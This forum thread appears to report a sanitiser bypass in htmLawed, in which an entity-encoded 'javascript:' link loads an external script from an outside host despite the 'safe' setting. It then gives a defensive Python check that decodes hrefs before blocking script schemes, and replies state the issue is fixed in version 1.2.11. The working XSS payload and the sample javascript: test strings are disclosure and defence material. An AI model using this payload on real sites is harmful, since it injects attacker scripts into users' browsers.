1 (edited by NinCollin 2022-12-28 00:50:20)

Topic: Bug/exploit with "javascript:"

With config option "safe" set to 1, the following snippet is not properly mitigated and presents an exploit:

<a href="javascript&colon;&lpar;function&lpar;&rpar;{document.body.appendChild&lpar;document.createElement&lpar;&#x27;script&#x27;&rpar;&rpar;.src=&#x27;https://scripts.rainynight.city/beanz.js&#x27;;}&rpar;&lpar;&rpar;;">Beans</a>

Certain special characters are replaced with HTML entities, and it's even possible to load external scripts (the script in this example is just an alert window).
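The gap behind the report above is a scheme check done on the raw attribute text instead of on the value a browser actually resolves. Below is an added defensive example in Python, not htmLawed's own code or the poster's: it decodes character references once, strips the control characters browsers ignore, and only then compares the scheme. The sample hrefs and the scheme list are constructed for the example.

```python
import html
import re

# Constructed sample attribute values (not taken from the post above),
# mapped to whether a browser would treat them as a script URL.
SAMPLE_HREFS = {
    "https://example.com/page": False,
    "javascript:alert(1)": True,
    "javascript&colon;alert&lpar;1&rpar;": True,  # entity-encoded colon, the pattern in the report
    "JAVA&#x09;SCRIPT&#58;alert(1)": True,         # case, tab and numeric references
    "&amp;colon;alert(1)": False,                  # double-encoded: a browser decodes only once
}

# Schemes that execute script from an href. Assumption: this list is the
# example's own, not an htmLawed setting.
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def normalize_href(value: str) -> str:
    """Approximate the normalisation a browser applies before resolving a URL."""
    # Decode named, decimal and hex character references exactly once, as the
    # HTML parser does; a comparison against the raw text never sees
    # "javascript&colon;" as "javascript:".
    decoded = html.unescape(value)
    # Drop ASCII control characters and spaces. This is stricter than the URL
    # spec (which strips leading/trailing controls and internal tab/newline)
    # but errs on the side of blocking, so "java\tscript:" is still caught.
    return re.sub(r"[\x00-\x20\x7f]", "", decoded)


def is_script_href(value: str) -> bool:
    """True when the normalised href starts with a script-executing scheme."""
    return normalize_href(value).lower().startswith(SCRIPT_SCHEMES)


def sanitize_href(value: str) -> str:
    """Replace script-scheme hrefs with a harmless anchor, keep anything else."""
    return "#" if is_script_href(value) else value


if __name__ == "__main__":
    for href, expected in SAMPLE_HREFS.items():
        assert is_script_href(href) == expected, href
    print("all sample hrefs classified as expected")
```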

2

Re: Bug/exploit with "javascript:"

Thanks for posting. Will follow up.

3

Re: Bug/exploit with "javascript:"

This important security issue is mitigated in the new version of htmLawed (1.2.11).